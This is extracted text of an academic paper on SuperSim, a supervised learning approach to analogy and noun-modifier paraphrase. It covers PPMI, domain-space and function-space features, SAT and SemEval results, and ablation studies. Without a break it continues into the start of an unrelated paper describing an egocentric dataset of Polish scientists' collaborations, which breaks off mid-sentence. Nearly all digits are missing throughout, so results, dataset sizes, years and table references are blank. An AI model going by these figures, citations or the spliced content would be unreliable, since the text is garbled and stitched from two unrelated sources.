we need the original high-dimensional columns for our features. the raw ppmi matrix has , rows and , columns with a density of . %. for each term in wordnet, there is a corresponding row in the raw ppmi matrix. for each unigram in word- net, there are two corresponding columns in the raw ppmi matrix, one marked left and the other right. suppose xi corresponds to the i-th row of the ppmi matrix and xj corresponds the j-th column, marked left. the value in the i-th row and j-th col- umn of the ppmi matrix, ppmi(xi, xj, left), is the positive pointwise mutual information of xi and xj co-occurring in the corpus, where xj is the first word to the left of xi, ignoring any intervening stop words (that is, ignoring any words that are not in wordnet). if xi (or xj) has no corresponding row (or column) in the matrix, then the ppmi value is set to zero. turney et al. ( ) estimated ppmi(xi, xj, left) by sampling the corpus for phrases containing xi and then looking for xj to the left of xi in the sampled phrases (and likewise for right). due to this sam- pling process, ppmi(xi, xj, left) does not necessar- ily equal ppmi(xj, xi, right). for example, suppose xi is a rare word and xj is a common word. with ppmi(xi, xj, left), when we sample phrases contain- ing xi, we are relatively likely to find xj in some of these phrases. with ppmi(xj, xi, right), when we sample phrases containing xj, we are less likely to find any phrases containing xi. although, in theory, ppmi(xi, xj, left) should equal ppmi(xj, xi, right), they are likely to be unequal given a limited sample. from the n-tuple, we select all of the n(n − ) pairs, 〈xi, xj〉, such that i = j. we then gener- ate two features for each pair, ppmi(xi, xj, left) and ppmi(xi, xj, right). thus there are n(n− ) ppmi values in the second set of features. the third set of features consists of domain space similarity values for each pair of words in the n-tuple. domain space was designed to capture the topic of a word. turney ( ) first constructed a frequency matrix, in which the rows correspond to terms in wordnet and the columns correspond to nearby nouns. given a term xi, the corpus was sam- pled for phrases containing xi and the phrases were processed with a part-of-speech tagger, to identify nouns. if the noun xj was the closest noun to the left or right of xi, then the frequency count for the i-th row and j-th column was incremented. the hypoth- esis was that the nouns near a term characterize the topics associated with the term. the word–context frequency matrix for domain space has , rows (terms) and , columns (noun contexts, topics), with a density of . %. the frequency matrix was converted to a ppmi matrix and then smoothed with svd. the svd yields three matrices, u, Σ, and v. a term in domain space is represented by a row vector in ukΣ p k. the parameter k specifies the num- ber of singular values in the truncated singular value decomposition; that is, k is the number of latent factors in the low-dimensional representation of the term (landauer and dumais, ). we generate uk and Σk by deleting the columns in u and Σ corresponding to the smallest singular values. the parameter p raises the singular values in Σk to the power p (caron, ). as p goes from one to zero, factors with smaller singular values are given more weight. this has the effect of making the similarity measure more discriminating (turney, ). the similarity of two words in domain space, dom(xi, xj, k, p), is computed by extracting the row vectors in ukΣ p k that correspond to the words xi and xj, and then calculating their cosine. optimal per- formance requires tuning the parameters k and p for the task (bullinaria and levy, ; turney, ). in the following experiments, we avoid directly tun- ing k and p by generating features with a variety of values for k and p, allowing the supervised learning algorithm to decide which features to use. feature set size of set lf(xi) n ppmi(xi, xj, handedness) n(n− ) dom(xi, xj, k, p) n(n− )nknp fun(xi, xj, k, p) n(n− )nknp table : the four sets of features and their sizes. from the n-tuple, we select all n(n − ) pairs, 〈xi, xj〉, such that i < j. for each pair, we gen- erate domain similarity features, dom(xi, xj, k, p), where k varies from to in steps of and p varies from to in steps of . . the number of k values, nk, is and the number of p values, np, is ; therefore there are features, nknp, for each pair, 〈xi, xj〉. thus there are n(n− )nknp domain space similarity values in the third set of features. the fourth set of features consists of function space similarity values for each pair of words in the n-tuple. function space was designed to capture the functional role of a word. it is similar to domain space, except the context is based on verbal patterns, instead of nearby nouns. the hypothesis was that the functional role of a word is characterized by the patterns that relate the word to nearby verbs. the word–context frequency matrix for function space has , rows (terms) and , columns (verb pattern contexts, functional roles), with a den- sity of . %. the frequency matrix was converted to a ppmi matrix and smoothed with svd. from the n-tuple, we select all n(n − ) pairs, 〈xi, xj〉, such that i < j. for each pair, we generate function similarity features, fun(xi, xj, k, p), where k and p vary as they did with domain space. thus there are n(n − )nknp function space similarity values in the fourth set of features. table summarizes the four sets of features and the size of each set as a function of n, the number of words in the given tuple. the values of nk and np ( and ) are considered to be constants. table shows the number of elements in the feature vector, as n varies from to . the total number of features is o(n ). we believe that this is acceptable growth and will scale up to comparing sentence pairs. the four sets of features have a hierarchical rela- tionship. the log frequency features are based on counting isolated occurrences of each word in the n-tuple lf ppmi dom fun total table : number of features for various tuple sizes. corpus. the ppmi features are based on direct co- occurrences of two words; that is, ppmi is only greater than zero if the two words actually occur together in the corpus. domain and function space capture indirect or higher-order co-occurrence, due to the truncated svd (lemaire and denhière, ); that is, the values of dom(xi, xj, k, p) and fun(xi, xj, k, p) can be high even when xi and xj do not actually co-occur in the corpus. we conjec- ture that there are yet higher orders in this hierarchy that would provide improved similarity measures. supersim learns to classify tuples by representing them with these features. supersim uses the sequen- tial minimal optimization (smo) support vector machine (svm) as implemented in weka (platt, ; witten et al., ). the kernel is a normal- ized third-order polynomial. weka provides proba- bility estimates for the classes by fitting the outputs of the svm with logistic regression models. relational similarity this section presents experiments with learning rela- tional similarity using supersim. the training datasets consist of quadruples that are labeled as positive and negative examples of analogies. table shows that the feature vectors have , elements. we experiment with three datasets, a collection of five-choice questions from the sat col- lege entrance exam (turney et al., ), a modi- fied ten-choice variation of the sat questions (tur- ney, ), and the relational similarity dataset from semeval task (jurgens et al., ). weka is available at http://www.cs.waikato.ac. nz/ml/weka/. the sat questions are available on request from the author. the semeval task dataset is available at https:// sites.google.com/site/semeval task /. stem: word:language choices: ( ) paint:portrait ( ) poetry:rhythm ( ) note:music ( ) tale:story ( ) week:year solution: ( ) note:music table : a five-choice sat analogy question. . five-choice sat questions table is an example of a question from the five-choice sat questions. each five-choice ques- tion yields five labeled quadruples, by combining the stem with each choice. the quadruple 〈word, lan- guage, note, music〉 is labeled positive and the other four quadruples are labeled negative. since learning works better with balanced train- ing data (japkowicz and stephen, ), we use the symmetries of proportional analogies to add more positive examples (lepage and shin-ichi, ). for each positive quadruple, 〈a, b, c, d〉, we add three more positive quadruples, 〈b, a, d, c〉, 〈c, d, a, b〉, and 〈d, c, b, a〉. thus each five-choice question pro- vides four positive and four negative quadruples. we use ten-fold cross-validation to apply super- sim to the sat questions. the folds are constructed so that the eight quadruples from each sat question are kept together in the same fold. to answer a ques- tion in the testing fold, the learned model assigns a probability to each of the five choices and guesses the choice with the highest probability. supersim achieves a score of . % correct ( out of ). table gives the rank of supersim in the list of the top ten results with the sat analogy questions. the scores ranging from . % to . % are not sig- nificantly different from supersim’s score of . %, according to fisher’s exact test at the % confi- dence level. however, supersim answers the sat questions in a few minutes, whereas lra requires nine days, and supersim learns its models automat- ically, unlike the hand-coding of turney ( ). see the state of the art page on the acl wiki at http: //aclweb.org/aclwiki. algorithm reference correct know-best veale ( ) . k-means biçici & yuret ( ) . bagpack herdağdelen & baroni ( ) . vsm turney & littman ( ) . dual-space turney ( ) . bmi bollegala et al. ( ) . pairclass turney ( b) . pert turney ( a) . supersim — . lra turney ( b) . human average college applicant . table : the top ten results on five-choice sat questions. . ten-choice sat questions in addition to symmetries, proportional analogies have asymmetries. in general, if the quadruple 〈a, b, c, d〉 is positive, 〈a, d, c, b〉 is negative. for example, 〈word, language, note, music〉 is a good analogy, but 〈word, music, note, language〉 is not. words are the basic units of language and notes are the basic units of music, but words are not necessary for music and notes are not necessary for language. turney ( ) used this asymmetry to convert the five-choice sat questions into ten- choice sat questions. each choice 〈c, d〉 was expanded with the stem 〈a, b〉, resulting in the quadruple 〈a, b, c, d〉, and then the order was shuf- fled to 〈a, d, c, b〉, so that each choice pair in a five- choice question generated two choice quadruples in a ten-choice question. nine of the quadruples are negative examples and the quadruple consisting of the stem pair followed by the solution pair is the only positive example. the purpose of the ten-choice questions is to test the ability of measures of rela- tional similarity to avoid the asymmetric distractors. we use the ten-choice questions to compare the hand-coded dual-space approach (turney, ) with supersim. we also use these questions to per- form an ablation study of the four sets of features in supersim. as with the five-choice questions, we use the symmetries of proportional analogies to add three more positive examples, so the training dataset has nine negative examples and four posi- tive examples per question. we apply ten-fold cross- validation to the ten-choice questions. on the ten-choice questions, supersim’s score features algorithm lf ppmi dom fun correct dual-space . supersim . supersim . supersim . supersim . supersim . supersim . supersim . supersim . supersim . table : feature ablation with ten-choice sat questions. is . % (table ), compared to . % on the five-choice questions (table ), a drop of . %. the hand-coded dual-space model scores . % (table ), compared to . % on the five-choice questions (table ), a drop of . %. the dif- ference between supersim ( . %) and the hand- coded dual-space model ( . %) is not significant according to fisher’s exact test at the % confi- dence level. the advantage of supersim is that it does not need hand-coding. the results show that supersim can avoid the asymmetric distractors. table shows the impact of different subsets of features on the percentage of correct answers to the ten-choice sat questions. included features are marked and ablated features are marked . the results show that the log frequency (lf) and ppmi features are not helpful (but also not harmful) for relational similarity. we also see that domain space and function space are both needed for good results. . semeval task the semeval task dataset is based on the semantic relation classification scheme of bejar et al. ( ), consisting of ten high-level categories of relations and seventy-nine subcategories, with paradigmatic examples of each subcategory. for instance, the subcategory taxonomic in the cate- gory class inclusion has three paradigmatic exam- ples, flower:tulip, emotion:rage, and poem:sonnet. jurgens et al. ( ) used amazon’s mechanical turk to create the semeval task dataset in two phases. in the first phase, turkers expanded the paradigmatic examples for each subcategory to an algorithm reference spearman buap tovar et al. ( ) . duluth-v pedersen ( ) . duluth-v pedersen ( ) . duluth-v pedersen ( ) . utd-svm rink & harabagiu ( ) . utd-nb rink & harabagiu ( ) . rnn- mikolov et al. ( ) . utd-lda rink & harabagiu ( ) . com zhila et al. ( ) . supersim — . table : spearman correlations for semeval task . average of forty-one word pairs per subcategory, a total of , pairs. in the second phase, each word pair from the first phase was assigned a prototypical- ity score, indicating its similarity to the paradigmatic examples. the challenge of semeval task was to guess the prototypicality scores. supersim was trained on the five-choice sat questions and evaluated on the semeval task test dataset. for a given a word pair, we created quadruples, combining the word pair with each of the paradigmatic examples for its subcategory. we then used supersim to compute the probabilities for each quadruple. our guess for the prototypicality score of the given word pair was the average of the probabilities. spearman’s rank correlation coef- ficient between the turkers’ prototypicality scores and supersim’s scores was . , averaged over the sixty-nine subcategories in the testing set. super- sim has the highest spearman correlation achieved to date on semeval task (see table ). compositional similarity this section presents experiments using supersim to learn compositional similarity. the datasets con- sist of triples, 〈a, b, c〉, such that ab is a noun- modifier bigram and c is a noun unigram. the triples are labeled as positive and negative exam- ples of paraphrases. table shows that the fea- ture vectors have elements. we experiment with two datasets, seven-choice and fourteen-choice noun-modifier questions (turney, ). the seven-choice dataset is available at http://jair. org/papers/paper .html. the fourteen-choice dataset can be generated from the seven-choice dataset. stem: fantasy world choices: ( ) fairyland ( ) fantasy ( ) world ( ) phantasy ( ) universe ( ) ranter ( ) souring solution: ( ) fairyland table : a noun-modifier question based on wordnet. . noun-modifier questions the first dataset is a seven-choice noun-modifier question dataset, constructed from wordnet (tur- ney, ). the dataset contains questions for training and , for testing, a total of , ques- tions. table shows one of the questions. the stem is a bigram and the choices are uni- grams. the bigram is composed of a head noun (world), modified by an adjective or noun (fantasy). the solution is the unigram (fairyland) that belongs to the same wordnet synset as the stem. the distractors are designed to be difficult for cur- rent approaches to composition. for example, if fan- tasy world is represented by element-wise multipli- cation of the context vectors for fantasy and world (mitchell and lapata, ), the most likely guess is fantasy or world, not fairyland (turney, ). each seven-choice question yields seven labeled triples, by combining the stem with each choice. the triple 〈fantasy, world, fairyland〉 is labeled pos- itive and the other six triples are labeled negative. in general, if 〈a, b, c〉 is a positive example, then 〈b, a, c〉 is negative. for example, world fantasy is not a paraphrase of fairyland. the second dataset is constructed by applying this shuffling transfor- mation to convert the , seven-choice questions into , fourteen-choice questions (turney, ). the second dataset is designed to be difficult for approaches that are not sensitive to word order. table shows the percentage of the testing questions that are answered correctly for the two datasets. because vector addition and element-wise multiplication are not sensitive to word order, they perform poorly on the fourteen-choice questions. for both datasets, supersim performs significantly correct algorithm -choices -choices vector addition . . element-wise multiplication . . dual-space model . . supersim . . holistic model . — table : results for the two noun-modifier datasets. better than all other approaches, except for the holis- tic approach, according to fisher’s exact test at the % confidence level. the holistic approach is noncompositional. the stem bigram is represented by a single context vec- tor, generated by treating the bigram as if it were a unigram. a noncompositional approach cannot scale up to realistic applications (turney, ). the holistic approach cannot be applied to the fourteen- choice questions, because the bigrams in these ques- tions do not correspond to terms in wordnet, and hence they do not correspond to row vectors in the matrices we use (see section ). turney ( ) found it necessary to hand-code a soundness check into all of the algorithms (vector addition, element-wise multiplication, dual-space, and holistic). given a stem ab and a choice c, the hand-coded check assigns a minimal score to the choice if c = a or c = b. we do not need to hand- code any checking into supersim. it learns automat- ically from the training data to avoid such choices. . ablation experiments table shows the effects of ablating sets of fea- tures on the performance of supersim with the fourteen-choice questions. ppmi features are the most important; by themselves, they achieve . % correct, although the other features are needed to reach . %. domain space features reach the sec- ond highest performance when used alone ( . %), but they reduce performance (from . % to . %) when combined with other features; however, the drop is not significant according to fisher’s exact test at the % significance level. since the ppmi features play an important role in answering the noun-modifier questions, let us take the results for supersim are new but the other results in table are from turney ( ). features algorithm lf ppmi dom fun correct dual-space . supersim . supersim . supersim . supersim . supersim . supersim . supersim . supersim . supersim . table : ablation with fourteen-choice questions. ppmi feature subsets 〈a, b〉 〈a, c〉 〈b, c〉 correct . . . . . . . . table : ppmi subset ablation with fourteen-choices. a closer look at them. from table , we see that there are twelve ppmi features for the triple 〈a, b, c〉, where ab is a noun-modifier bigram and c is a noun unigram. we can split the twelve features into three subsets, one subset for each pair of words, 〈a, b〉, 〈a, c〉, and 〈b, c〉. for example, the subset for 〈a, b〉 is the four features ppmi(a, b, left), ppmi(b, a, left), ppmi(a, b, right), and ppmi(b, a, right). table shows the effects of ablating these subsets. the results in table indicate that all three ppmi subsets contribute to the performance of supersim, but the 〈a, b〉 subset contributes more than the other two subsets. the 〈a, b〉 features help to increase the sensitivity of supersim to the order of the words in the noun-modifier bigram; for exam- ple, they make it easier to distinguish fantasy world from world fantasy. . holistic training supersim uses training questions to learn to rec- ognize when a bigram is a paraphrase of a unigram; it learns from expert knowledge implicit in wordnet stem: search engine choices: ( ) search engine ( ) search ( ) engine ( ) search language ( ) search warrant ( ) diesel engine ( ) steam engine solution: ( ) search engine table : a question based on holistic vectors. synsets. it would be advantageous to be able to train supersim with less reliance on expert knowledge. past work with adjective-noun bigrams has shown that we can use holistic bigram vectors to train a supervised regression model (guevara, ; baroni and zamparelli, ). the output of the regression model is a vector representation for a bigram that approximates the holistic vector for the bigram; that is, it approximates the vector we would get by treat- ing the bigram as if it were a unigram. supersim does not generate vectors as output, but we can still use holistic bigram vectors for training. table shows a seven-choice training question that was generated without using wordnet synsets. the choices of the form a b are bigrams, but we repre- sent them with holistic bigram vectors; we pretend they are unigrams. we call a b bigrams pseudo- unigrams. as far as supersim is concerned, there is no difference between these pseudo-unigrams and true unigrams. the question in table is treated the same as the question in table . we generate holistic training questions by randomly selecting noun-modifier bigrams from wordnet as stems for the questions (search engine), avoiding any bigrams that appear as stems in the testing questions. the solution (search engine) is the pseudo-unigram that corresponds to the stem bigram. in the matrices in section , each term in wordnet corresponds to a row vector. these corresponding row vectors enable us to treat bigrams from wordnet as if they were unigrams. the distractors are the component unigrams in the stem bigram (search and engine) and pseudo- unigrams that share a component word with the stem (search warrant, diesel engine). to construct the holistic training questions, we used wordnet as a correct training -choices -choices holistic . . standard . . table : results for supersim with holistic training. source of bigrams, but we ignored the rich infor- mation that wordnet provides about these bigrams, such as their synonyms, hypernyms, hyponyms, meronyms, and glosses. table compares holistic training to standard training (that is, training with questions like table versus training with questions like table ). the testing set is the standard testing set in both cases. there is a significant drop in performance with holistic training, but the performance still surpasses vector addition, element-wise multiplication, and the hand-coded dual-space model (see table ). since holistic questions can be generated auto- matically without human expertise, we experi- mented with increasing the size of the holistic train- ing dataset, growing it from , to , ques- tions in increments of , . the performance on the fourteen-choice questions with holistic train- ing and standard testing varied between . % and . % correct, with no clear trend up or down. this is not significantly different from the performance with holistic training questions ( . %). it seems likely that the drop in performance with holistic training instead of standard training is due to a difference in the nature of the standard questions (table ) and the holistic questions (table ). we are currently investigating this issue. we expect to be able to close the performance gap in future work, by improving the holistic questions. however, it is possible that there are fundamental limits to holistic training. discussion supersim performs slightly better (not statistically significant) than the hand-coded dual-space model on relational similarity problems (section ), but it performs much better on compositional similarity problems (section ). the ablation studies suggest this is due to the ppmi features, which have no effect on ten-choice sat performance (table ), but have a large effect on fourteen-choice noun-modifier para- phrase performance (table ). one advantage of supervised learning over hand- coding is that it facilitates adding new features. it is not clear how to modify the hand-coded equations for the dual-space model of noun-modifier composi- tion (turney, ) to include ppmi information. supersim is one of the few approaches to distri- butional semantics beyond words that has attempted to address both relational and compositional similar- ity (see section . ). it is a strength of this approach that it works well with both kinds of similarity. future work and limitations given the promising results with holistic training for noun-modifier paraphrases, we plan to experiment with holistic training for analogies. consider the proportional analogy hard is to hard time as good is to good time, where hard time and good time are pseudo-unigrams. to a human, this analogy is triv- ial, but supersim has no access to the surface form of a term. as far as supersim is concerned, this analogy is much the same as the analogy hard is to difficulty as good is to fun. this strategy automat- ically converts simple, easily generated analogies into more complex, challenging analogies, which may be suited to training supersim. this also suggests that noun-modifier paraphrases may be used to solve analogies. perhaps we can evaluate the quality of a candidate analogy 〈a, b, c, d〉 by searching for a term e such that 〈b, e, a〉 and 〈d, e, c〉 are good paraphrases. for example, consider the analogy mason is to stone as carpenter is to wood. we can paraphrase mason as stone worker and carpenter as wood worker. this transforms the analogy to stone worker is to stone as wood worker is to wood, which makes it easier to recognize the relational similarity. another area for future work is extending super- sim beyond noun-modifier paraphrases to measur- ing the similarity of sentence pairs. we plan to adapt ideas from socher et al. ( ) for this task. they use dynamic pooling to represent sentences of vary- ing size with fixed-size feature vectors. using fixed- size feature vectors avoids the problem of quadratic growth and it enables the supervised learner to gen- eralize over sentences of varying length. some of the competing approaches discussed by erk ( ) incorporate formal logic. the work of baroni et al. ( ) suggests ways that supersim could be developed to deal with logic. we believe that supersim could benefit from more features, with greater diversity. one place to look for these features is higher levels in the hierar- chy that we sketch in section . our ablation experiments suggest that domain and function spaces provide the most important features for relational similarity, but ppmi values provide the most important features for noun-modifier composi- tional similarity. explaining this is another topic for future research. conclusion in this paper, we have presented supersim, a unified approach to analogy (relational similarity) and para- phrase (compositional similarity). supersim treats them both as problems of supervised tuple classifi- cation. the supervised learning algorithm is a stan- dard support vector machine. the main contribution of supersim is a set of four types of features for rep- resenting tuples. the features work well with both analogy and paraphrase, with no task-specific mod- ifications. supersim matches the state of the art on sat analogy questions and substantially advances the state of the art on the semeval task chal- lenge and the noun-modifier paraphrase questions. supersim runs much faster than lra (turney, b), answering the sat questions in minutes instead of days. unlike the dual-space model (tur- ney, ), supersim requires no hand-coded simi- larity composition functions. since there is no hand- coding, it is easy to add new features to supersim. much work remains to be done, such as incorporat- ing logic and scaling up to sentence paraphrases, but past work suggests that these problems are tractable. in the four approaches described by erk ( ), supersim is an instance of the second approach to extending distributional semantics beyond words, comparing word pairs, phrases, or sentences (in gen- eral, tuples) by combining multiple pairwise simi- larity values. perhaps the main significance of this paper is that it provides some evidence in support of this general approach. references eneko agirre, daniel cer, mona diab, and aitor gonzalez-agirre. . semeval- task : a pilot on semantic textual similarity. in proceedings of the first joint conference on lexical and compu- tational semantics (*sem), pages – , montréal, canada. ion androutsopoulos and prodromos malakasiotis. . a survey of paraphrasing and textual entailment methods. journal of artificial intelligence research, : – . marco baroni and roberto zamparelli. . nouns are vectors, adjectives are matrices: representing adjective-noun constructions in semantic space. in proceedings of the conference on empirical methods in natural language processing (emnlp ), pages – . marco baroni, raffaella bernardi, ngoc-quynh do, and chung-chieh shan. . entailment above the word level in distributional semantics. in proceedings of the th conference of the european chapter of the asso- ciation for computational linguistics (eacl ), pages – . isaac i. bejar, roger chaffin, and susan e. embretson. . cognitive and psychometric analysis of ana- logical problem solving. springer-verlag. ergun biçici and deniz yuret. . clustering word pairs to answer analogy questions. in proceedings of the fifteenth turkish symposium on artificial intelli- gence and neural networks (tainn ), akyaka, mugla, turkey. danushka bollegala, yutaka matsuo, and mitsuru ishizuka. . www sits the sat: measuring rela- tional similarity on the web. in proceedings of the th european conference on artificial intelligence (ecai ), pages – , patras, greece. danushka bollegala, yutaka matsuo, and mitsuru ishizuka. . measuring the similarity between implicit semantic relations from the web. in proceed- ings of the th international conference on world wide web (www ), pages – . john bullinaria and joseph levy. . extract- ing semantic representations from word co-occurrence statistics: a computational study. behavior research methods, ( ): – . john bullinaria and joseph levy. . extract- ing semantic representations from word co-occurrence statistics: stop-lists, stemming, and svd. behavior research methods, ( ): – . john caron. . experiments with lsa scor- ing: optimal rank and basis. in proceedings of the siam computational information retrieval work- shop, pages – , raleigh, nc. kenneth church and patrick hanks. . word asso- ciation norms, mutual information, and lexicography. in proceedings of the th annual conference of the association of computational linguistics, pages – , vancouver, british columbia. daoud clarke. . a context-theoretic framework for compositionality in distributional semantics. compu- tational linguistics, ( ): – . katrin erk. . towards a semantics for distributional representations. in proceedings of the th interna- tional conference on computational semantics (iwcs ), potsdam, germany. john rupert firth. . a synopsis of linguistic theory – . in studies in linguistic analysis, pages – . blackwell, oxford. dan garrette, katrin erk, and ray mooney. . inte- grating logical representations with probabilistic infor- mation using markov logic. in proceedings of the th international conference on computational semantics (iwcs ), pages – . dedre gentner. . structure-mapping: a theoretical framework for analogy. cognitive science, ( ): – . roxana girju, preslav nakov, vivi nastase, stan szpakowicz, peter turney, and deniz yuret. . semeval- task : classification of semantic relations between nominals. in proceedings of the fourth international workshop on semantic evalua- tions (semeval ), pages – , prague, czech republic. emiliano guevara. . a regression model of adjective-noun compositionality in distributional semantics. in proceedings of the workshop on geometrical models of natural language semantics (gems ), pages – . zellig harris. . distributional structure. word, ( ): – . iris hendrickx, su nam kim, zornitsa kozareva, preslav nakov, diarmuid ó séaghdha, sebastian padó, marco pennacchiotti, lorenza romano, and stan szpakow- icz. . semeval- task : multi-way classifica- tion of semantic relations between pairs of nominals. in proceedings of the th international workshop on semantic evaluation, pages – , uppsala, sweden. amaç herdağdelen and marco baroni. . bagpack: a general framework to represent semantic relations. in proceedings of the eacl geometrical models for natural language semantics (gems) workshop, pages – . nathalie japkowicz and shaju stephen. . the class imbalance problem: a systematic study. intelligent data analysis, ( ): – . david a. jurgens, saif m. mohammad, peter d. tur- ney, and keith j. holyoak. . semeval- task : measuring degrees of relational similarity. in proceedings of the first joint conference on lexi- cal and computational semantics (*sem), pages – , montréal, canada. thomas k. landauer and susan t. dumais. . a solution to plato’s problem: the latent seman- tic analysis theory of the acquisition, induction, and representation of knowledge. psychological review, ( ): – . benoı̂t lemaire and guy denhière. . effects of high-order co-occurrences on word semantic similar- ity. current psychology letters: behaviour, brain & cognition, ( ). yves lepage and ando shin-ichi. . saussurian analogy: a theoretical account and its application. in proceedings of the th international conference on computational linguistics (coling ), pages – . kevin lund, curt burgess, and ruth ann atchley. . semantic and associative priming in high-dimensional semantic space. in proceedings of the th annual conference of the cognitive science society, pages – . tomas mikolov, wen-tau yih, and geoffrey zweig. . linguistic regularities in continuous space word representations. in proceedings of the confer- ence of the north american chapter of the associa- tion for computational linguistics: human language technologies (naacl ), atlanta, georgia. jeff mitchell and mirella lapata. . vector-based models of semantic composition. in proceedings of acl- : hlt, pages – , columbus, ohio. association for computational linguistics. jeff mitchell and mirella lapata. . composition in distributional models of semantics. cognitive science, ( ): – . ted pedersen. . duluth: measuring degrees of relational similarity with the gloss vector measure of semantic relatedness. in first joint conference on lexical and computational semantics (*sem), pages – , montreal, canada. john c. platt. . fast training of support vector machines using sequential minimal optimization. in advances in kernel methods: support vector learn- ing, pages – , cambridge, ma. mit press. bryan rink and sanda harabagiu. . utd: deter- mining relational similarity using lexical patterns. in first joint conference on lexical and computational semantics (*sem), pages – , montreal, canada. bryan rink and sanda harabagiu. . the impact of selectional preference agreement on semantic rela- tional similarity. in proceedings of the th interna- tional conference on computational semantics (iwcs ), potsdam, germany. richard socher, eric h. huang, jeffrey pennington, andrew y. ng, and christopher d. manning. . dynamic pooling and unfolding recursive autoen- coders for paraphrase detection. in advances in neural information processing systems (nips ), pages – . richard socher, brody huval, christopher manning, and andrew ng. . semantic compositionality through recursive matrix-vector spaces. in proceed- ings of the joint conference on empirical meth- ods in natural language processing and computa- tional natural language learning (emnlp-conll ), pages – . mireya tovar, j. alejandro reyes, azucena montes, darnes vilariño, david pinto, and saul león. . buap: a first approximation to relational similar- ity measuring. in first joint conference on lexi- cal and computational semantics (*sem), pages – , montreal, canada. peter d. turney and michael l. littman. . corpus- based learning of analogies and semantic relations. machine learning, ( – ): – . peter d. turney and patrick pantel. . from fre- quency to meaning: vector space models of semantics. journal of artificial intelligence research, : – . peter d. turney, michael l. littman, jeffrey bigham, and victor shnayder. . combining independent mod- ules to solve multiple-choice synonym and analogy problems. in proceedings of the international con- ference on recent advances in natural language pro- cessing (ranlp- ), pages – , borovets, bul- garia. peter d. turney, yair neuman, dan assaf, and yohai cohen. . literal and metaphorical sense identifi- cation through concrete and abstract context. in pro- ceedings of the conference on empirical meth- ods in natural language processing, pages – . peter d. turney. a. expressing implicit semantic relations without supervision. in proceedings of the st international conference on computational lin- guistics and th annual meeting of the association for computational linguistics (coling/acl- ), pages – , sydney, australia. peter d. turney. b. similarity of semantic relations. computational linguistics, ( ): – . peter d. turney. a. the latent relation mapping engine: algorithm and experiments. journal of artifi- cial intelligence research, : – . peter d. turney. b. a uniform approach to analo- gies, synonyms, antonyms, and associations. in pro- ceedings of the nd international conference on computational linguistics (coling ), pages – , manchester, uk. peter d. turney. . domain and function: a dual- space model of semantic relations and compositions. journal of artificial intelligence research, : – . tony veale. . wordnet sits the sat: a knowledge- based approach to lexical analogy. in proceedings of the th european conference on artificial intel- ligence (ecai ), pages – , valencia, spain. ian h. witten, eibe frank, and mark a. hall. . data mining: practical machine learning tools and tech- niques, third edition. morgan kaufmann, san fran- cisco. alisa zhila, wen-tau yih, christopher meek, geoffrey zweig, and tomas mikolov. . combining het- erogeneous models for measuring relational similar- ity. in proceedings of the conference of the north american chapter of the association for com- putational linguistics: human language technolo- gies (naacl ), atlanta, georgia. © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /). issue | vol. article | doi: . /connections- - connections academic collaboration via resource contributions: an egocentric dataset michał bojanowski, ,* dominika czerniawska and wojciech fenrich kozminski university, warsaw, poland. university of manchester, manchester, uk and university of warsaw, warsaw, poland. university of warsaw, warsaw, poland. *e-mail: michal @gmail.com abstract in order to understand scientists’ incentives to form collaborative relations, we have conducted a study looking into academically relevant resources, which scientists contribute into collaborations with others. the data we describe in this paper are an egocentric dataset assembled by coding originally qualitative material. it is multiplex ego networks containing data on individual attributes (such as gender, scientific degree), collaboration ties (including alter–alter ties), and resource flows. resources are coded using a developed inventory of types of academically relevant resources egos and alters contribute into their collaborations. we share the data with the research community with the hopes of enriching knowledge and tools for studying sociological and behavioral aspects of science as a social process. keywords collaboration networks, resources, sociology of science, ego networks. scientometric studies report steadily increasing trend in multi-authored scientific publications. it is clearly an evidence that contemporary science requires cooperation and is not anymore a traditionally individualistic activity (moody, ). the presented data set comes from a study in which our overarching research goal was to understand why some scientists collaborate, but some others do not. in particular, our approach was to think about incentives that might lead them to do so. inspired by coleman ( ) and, among others, laudel ( ), lewis et al. ( ) as well as our earlier results (czerniawska et al., ), we assume that the incentives to collaborate come from academically relevant resources the scientists possess or control and the interests they might have in resources possessed or controlled by others. for example, a theorist and an experimentalist might be interested in each other’s resources – ability to develop theoretical model of the studied problem and skills in conducting experiments, respectively. unequal distribution of these resources across academic community and the necessity of pooling them to get ahead in contemporary science results in incentives to collaborate. current state of knowledge still lacks a universally accepted behavioral understanding of the scientific process, let alone standardized tools for measuring academically relevant resources. hence, we conducted a qualitative study among polish scientists with the goal to: . collect egocentric data on collaborative relations; . develop an inventory of academically relevant resources from respondents’ reports; and . measure what resources (item ) collaborating parties (ego and alters) engage in their collab- oration ties (item ). the data we hereby share are based on transcriptions and coding of the originally qualitative material. the second section provides some brief background information on science in poland and details our contribution. the presented study involved interviews conducted on a sample of polish scientists, academic collaboration via resource contributions: an egocentric dataset which we describe further in the third section. in the fourth section, we describe the way in which the inventory of resources was constructed. a complete list with example quotes is provided on the associated website. the fifth section describes the structure of the data set. the sixth section provides illustrative examples. the seventh section provides the details where the data can be found and how it can be accessed. finally, in the eight section, we discuss limitations and potential uses of the data. background and contribution the presented data come from a study, which was conducted in poland among polish researchers. polish scientific community is among the largest in europe: according to oecd ( ) statistics, there were , researchers in poland in . at the same time, the funding and material resources are only average (cf. czerniawska, ; kwiek and szadkowski, ). these conditions, next to some others, keep polish science largely outside of the strict core of international scientific collaboration (leydesdorff et al., ). the organization and institutions of polish scientific system resemble “continental” systems (e.g. german scientific system). a typical scientific career requires a four year phd program, a habilitation which is expected within eight years after a phd. obtaining a habilitation is perceived as the final step to becoming an independent scholar. polish scientific community, similarly to many other scientific communities in europe, is rather diverse. it is a mix of modern, competitive, internationalized disciplines and groups, and more conservative locally oriented areas (kwiek, ). explaining the presence or absence of collabo- ration relations among scientists by referring to complementarities between them is not a new idea. for example, qin et al. ( ) in their bibliometric analysis use institutional affiliation to capture different specialization of scientists. moody ( ) approximates different types of contributions by analyzing subject codes put on articles indexed by sociological abstracts. our goal was to collect a list of resources they believe are relevant when working as a scientist. we believe a genuine contribution of the presented data set lies in that detailed information on the flow of resources in scientific collaborations. the catalogue, which is a unique contribution in scientific collaboration studies, was constructed based on the extensive literature review and themes mentioned by our interviewees. the data have been used to study whether structurally non-redundant ties are more likely to be characterized with resource contributions not found in other ties (bojanowski and czerniawska, ). sample data come from individual in-depth interviews (idi) conducted between april and august by two interviewers. the quota sample consists of female and male scientists from six polish cities. respondents represented a broad range of disciplines: natural sciences, social sciences, life sciences, the humanities, engineering, and technology on different levels of career from phd candidates to professors. the interviewees mentioned collaborators in total. interviews lasting between and min were recorded and later transcribed. measurement each interview consisted of several parts, three of which are of relevance here: . respondents were asked 